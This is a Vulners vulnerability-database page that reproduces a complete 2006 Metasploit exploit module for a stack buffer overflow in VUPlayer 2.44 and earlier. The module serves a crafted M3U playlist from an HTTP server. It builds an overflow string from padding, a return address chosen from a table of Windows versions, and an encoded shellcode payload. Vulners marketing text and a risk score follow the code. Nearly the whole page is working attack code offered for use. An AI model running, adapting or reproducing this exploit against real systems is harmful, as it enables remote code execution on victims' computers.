Vulners
Lucene search
VUPlayer <= 2.44 - (.M3U UNC Name) Buffer Overflow Exploit (meta)
require 'msf/core'
module Msf
class Exploits::Windows::Browser::VUPlayer_M3U < Msf::Exploit::Remote
include Exploit::Remote::HttpServer::Html
def initialize(info = {})
super(update_info(info,
'Name' => 'VUPlayer <= 2.44 M3U UNC Name Buffer Overflow',
'Description' => %q{
This module exploits a stack overflow in VUPlayer 2.44 and lower.
The vulnerability is caused due to a boundary error within
the parsing of playlists containing an overly entries.
After overwriting EIP with our return address, ESP stores our exploit.
This module uses the M3U file format. Original Discovery was by Greg Linares
Expanders wrote the first PoC in C format.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Greg Linares', # initial discovery and this metasploit module
'Expanders', # wrote the original POC code
],
'Version' => '$Revision: 1.0.0 $',
'References' =>
[
[ 'Email', '[email protected]'],
[ 'Email', '[email protected]'],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 800,
'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40",
'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Universal v2.44 and Lower - Bass.dll', { 'Ret' => 0x10010c3b } ],
[ 'Windows XP Pro SP2 English', { 'Ret' => 0x77db41bc } ],
[ 'Windows 2003 SP0 and SP1 English', { 'Ret' => 0x77d74adc } ],
[ 'Windows 2000 Pro English SP4', { 'Ret' => 0x77e14c29 } ],
[ 'Windows XP Pro SP2 French', { 'Ret' => 0x77d8519f } ],
[ 'Windows XP Pro SP2 German', { 'Ret' => 0x77d873a0 } ],
[ 'Windows XP Pro SP2 Italian', { 'Ret' => 0x77d873a0 } ],
[ 'Windows XP Pro SP2 Spainish', { 'Ret' => 0x77d9932f } ],
[ 'Windows XP Pro SP2 Dutch', { 'Ret' => 0x77d873a0 } ],
[ 'Windows XP Pro SP2 Polish', { 'Ret' => 0x77d873a0 } ],
[ 'Windows 2000 Pro French SP4', { 'Ret' => 0x77e04c29 } ],
[ 'Windows 2000 Pro Italian SP4', { 'Ret' => 0x77e04c29 } ],
[ 'Windows 2000 Pro German SP4', { 'Ret' => 0x77e04c29 } ],
[ 'Windows 2000 Pro Polish SP4', { 'Ret' => 0x77e04c29 } ],
[ 'Windows 2000 Pro Dutch SP4', { 'Ret' => 0x77e04c29 } ],
[ 'Windows 2000 Pro Spainish SP4', { 'Ret' => 0x77e04c29 } ],
[ 'Windows 2000 Server French SP4', { 'Ret' => 0x77df4c29 } ],
[ 'Windows 2000 Server Italian SP4', { 'Ret' => 0x77df4c29 } ],
[ 'Windows 2000 Server Chineese SP4', { 'Ret' => 0x77df4c29 } ],
],
'Privileged' => false,
'DisclosureDate' => 'Nov 29 2006',
'DefaultTarget' => 0))
end
def autofilter
false
end
def on_request_uri(client, request)
# Re-generate the payload
return if ((p = regenerate_payload(client)) == nil)
title = Rex::Text.rand_text_alpha_upper(8)
sploit = Rex::Text.rand_text_alpha_upper(1012) + [ target.ret ].pack('V')
sploit << payload.encoded
# Build the PLS Exploit
content = "#EXTM3U\r\n#EXTINF:8,#{title}"
content << "\r\n" + sploit
content << "\r\n"
print_status("Sending exploit to #{client.peerhost}:#{client.peerport}...")
# Transmit the response to the client
send_response(client, content)
end
end
end
# milw0rm.com [2006-11-30]
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1